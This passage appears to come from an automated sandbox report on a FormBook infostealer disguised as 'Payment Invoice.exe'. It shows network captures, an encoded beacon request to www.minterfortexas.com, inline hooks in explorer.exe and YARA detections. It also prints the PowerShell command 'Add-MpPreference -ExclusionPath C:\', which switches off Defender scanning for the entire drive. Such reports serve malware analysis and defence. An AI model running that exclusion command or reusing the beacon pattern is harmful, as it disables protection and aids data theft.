Apr 12, 2021 14:41:19.383213043 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.513685942 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516170025 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516197920 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516222954 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516244888 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516259909 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516278028 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516295910 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516311884 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516326904 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516343117 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.516351938 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.516408920 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.516482115 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.516489029 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.649198055 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649215937 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649287939 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.649302959 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649322987 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649343014 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649346113 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.649362087 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649410009 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649431944 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.649435997 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649457932 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649480104 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649498940 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649502039 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.649523973 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.649552107 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.649595022 CEST	49760	80	192.168.2.4	198.185.159.144

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 14:39:11.788572073 CEST	59123	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:11.849502087 CEST	53	59123	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:28.246284008 CEST	54531	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:28.296607018 CEST	53	54531	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:34.836317062 CEST	49714	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:34.887165070 CEST	53	49714	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:36.461183071 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:36.510087013 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:40.518122911 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:40.569143057 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:45.033421993 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:45.092379093 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:56.668689013 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:56.717528105 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:57.659349918 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:57.712431908 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 12, 2021 14:39:58.615314960 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:39:58.668315887 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:04.775096893 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:04.832498074 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:05.496288061 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:05.556891918 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:05.580235958 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:05.616993904 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:06.443831921 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:06.500834942 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:07.145061970 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:07.208156109 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:07.279871941 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:07.342111111 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:07.852077961 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:07.900767088 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:08.584896088 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:08.646239996 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:09.277481079 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:09.334768057 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:10.425539970 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:10.484303951 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:11.694168091 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:11.745222092 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:12.221942902 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:12.279324055 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:20.483020067 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:20.540050030 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:28.365004063 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:28.416538954 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:33.573276043 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:33.624902010 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:34.473867893 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:34.522449017 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:35.601871014 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:35.663249016 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:38.521826982 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:38.572782993 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:56.826630116 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:56.903141975 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:58.670516014 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:58.941359997 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 12, 2021 14:40:59.410506010 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:40:59.485570908 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 12, 2021 14:41:00.884249926 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:41:00.933099031 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 12, 2021 14:41:02.038280964 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:41:02.087215900 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 12, 2021 14:41:16.088772058 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:41:16.138391018 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 12, 2021 14:41:16.929337025 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:41:16.978096008 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 12, 2021 14:41:19.153084993 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:41:19.246695042 CEST	53	50183	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 14:40:58.670516014 CEST	192.168.2.4	8.8.8.8	0x91d7	Standard query (0)	www.the-techs.info	A (IP address)	IN (0x0001)
Apr 12, 2021 14:41:19.153084993 CEST	192.168.2.4	8.8.8.8	0x6b6f	Standard query (0)	www.minterfortexas.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 14:40:58.941359997 CEST	8.8.8.8	192.168.2.4	0x91d7	Name error (3)	www.the-techs.info	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 14:41:19.246695042 CEST	8.8.8.8	192.168.2.4	0x6b6f	No error (0)	www.minterfortexas.com	ext-cust.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 14:41:19.246695042 CEST	8.8.8.8	192.168.2.4	0x6b6f	No error (0)	ext-cust.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
Apr 12, 2021 14:41:19.246695042 CEST	8.8.8.8	192.168.2.4	0x6b6f	No error (0)	ext-cust.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Apr 12, 2021 14:41:19.246695042 CEST	8.8.8.8	192.168.2.4	0x6b6f	No error (0)	ext-cust.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
Apr 12, 2021 14:41:19.246695042 CEST	8.8.8.8	192.168.2.4	0x6b6f	No error (0)	ext-cust.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.minterfortexas.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49760	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:41:19.383213043 CEST	5771	OUT	GET /chue/?Bxl4iL=G9TtVN5R6EJkOjOehstyspBsMB8h6uPP4SNtk4flZ+Q+zaxTbo8GQGYSWt4KCoCWgLKd&xPZTBf=dn-paHGxXlDP HTTP/1.1 Host: www.minterfortexas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 14:41:19.516170025 CEST	5773	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Mon, 12 Apr 2021 12:41:19 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: RnSXHzn7/on0jWjJG Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Apr 12, 2021 14:41:19.516197920 CEST	5774	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Apr 12, 2021 14:41:19.516222954 CEST	5775	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Apr 12, 2021 14:41:19.516244888 CEST	5776	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Apr 12, 2021 14:41:19.516259909 CEST	5777	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Apr 12, 2021 14:41:19.516278028 CEST	5778	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
Apr 12, 2021 14:41:19.516295910 CEST	5780	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Apr 12, 2021 14:41:19.516311884 CEST	5781	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Apr 12, 2021 14:41:19.516326904 CEST	5782	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
Apr 12, 2021 14:41:19.516343117 CEST	5783	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Apr 12, 2021 14:41:19.649198055 CEST	5785	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE2
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE2
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE2
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE2

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Payment Invoice.exe PID: 6860 Parent PID: 5812

General

Start time:	14:39:17
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\Payment Invoice.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Payment Invoice.exe'
Imagebase:	0x4e0000
File size:	669184 bytes
MD5 hash:	EBFEAA73811B084FF7EC882503205988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.720423226.00000000029B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000003.712145494.0000000007311000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000000.640844843.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 6680 Parent PID: 6860

General

Start time:	14:39:50
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'powershell' Add-MpPreference -ExclusionPath C:\
Imagebase:	0xab0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6728 Parent PID: 6680

General

Start time:	14:39:50
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
